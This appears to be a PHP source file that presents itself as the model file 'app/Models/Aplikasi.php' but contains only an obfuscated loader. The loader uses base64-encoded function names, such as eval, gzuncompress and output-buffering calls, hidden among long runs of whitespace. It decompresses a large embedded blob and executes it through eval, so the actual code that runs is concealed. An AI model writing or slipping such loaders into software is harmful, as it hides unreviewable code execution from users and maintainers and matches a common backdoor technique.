<?php 
        $__='printf';$_='Loading app/Models/Aplikasi.php';
        































































































































































































                                                                                                                                                                                                $_____='    b2JfZW5kX2NsZWFu';                                                                                                                                                                              $______________='cmV0dXJuIGV2YWwoJF8pOw==';
$__________________='X19sYW1iZGE=';

                                                                                                                                                                                                                                          $______=' Z3p1bmNvbXByZXNz';                    $___='  b2Jfc3RhcnQ=';                                                                                                    $____='b2JfZ2V0X2NvbnRlbnRz';                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                $__=                                                              'base64_decode'                           ;                                                                       $______=$__($______);           if(!function_exists('__lambda')){function __lambda($sArgs,$sCode){return eval("return function($sArgs){{$sCode}};");}}                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                    $__________________=$__($__________________);                                                                                                                                                                                                                                                                                                                                                                         $______________=$__($______________);
        $__________=$__________________('$_',$______________);                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                 $_____=$__($_____);                                                                                                                                                                                                                                                    $____=$__($____);                                                                                                                    $___=$__($___);                      $_='eNrtmm1vm0gQx99Huu/gF5VIdVXCQ3w5ZPmFIYaAWyexE3bZNxG7OIawYGRsg/3pOzbkEuuuJzutTr1qfwh7eZidmf8OI8ui1ar58Ah0pXweZ4snqbM7bOhKQZ6ff5mFE16c93IeJ0ERn+VR3jJ5UBRnZ2dS56SZpvXbidh+vu1ku56tH0j3b2ckrOiFj5SY2P2utDv1WhUH0dRctyUQCAS/JhJLPTnE7tKxPdVH5cy19Ce8Ti7rpglds27Xj0IqgUAgEAgEAoHg/4b4O0MgEAh+XSQaFJM/Lh7DCZuFE6kjFBEIBAKB4LvYfxHBnOZLHymcaUbkqw/TO2yUuK+siO0VbFMMzMzbkLHhUrtSKOJLH4847o+i0LZiHw9h7BVUsxSC2jLuk8jXRiuWcs6UyoHrto+GMtXc9k2ZKwzmH6OqCJGS09SSiVf1Yb7IT60NjC1q61WIvGVoVUOqjji9Av/psIB5Nk7fKqnN5zDOHdu7CG1vSa6/TO+RnhBUDiblbOqYvWkIMTn9KGJyE0uWXJrT+hq7dldg9wx74pgj2UduQcY93THdEuLPIBaFpdYSq298PUMMcQ/sjZKlukwgH4Lupq5NctAEYq+4cyVPUeO/3t05wUn82ezFYWpBvg+7caB6MsFuRNMworFT1PM2e5pzmvKNE5cwXoC+Xga65XA82F235Dd5eDHE9+xcD2WIOffXRhqiNuTFVzQ2tABV0QRZs4GZ1LbXxeA1tl7iY6MI0CJiajK9HRsbgqr05jnPCL6bDe5f8q13196tNXXVxbYmnnYapnwJthneaTeKmF3lgWptgrH8e6hGnKUPM7ifT8ascMxwvl1LrBlrqoFm2TB318niNiU5y4YyxLi4zUhErz1+s6fhKNnWBlqH2/qM9uwVGeLeywPmCGegLR+AP9A+A70zqLGF7+nbdVMD1Ib4WP75vp0G2N2EUPgwVn1UKeR+Xx9iW7LvFVmgQm15+hzqRGFwjqCL43JWF5GfeeX2maHxcb6b2N/ju9brO3y/5A21HlEE547Pm/sqxA/r99683+H7Je93+27yTggeRofW2J7Ne+oa9GJq/8gca5sB3ENSvmYaPLfb++tec/nPz2+1Iqr+xDRv7eO7Q/0VVA1XWBtu+6L8L/m90dNYk10fvWh895t4DP3A/vXNXvxD+5k25PB8QH21n8BPm6oH1xnM7yowxxJrLvRZffktXZyrP88dk2UH65PJA6lzcvLf/xjo7r5Pm6OPnWPM39geYvjh1eGptP2UPv3lVrzz+HO/87i/hqd7RVMv4cfOV88E7Nk=';

        $___();$__________($______($__($_))); $________=$____();
                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                             $_____();                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                       echo                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                                      






























































































































































































                                                                                                                                                                                                                     $________;
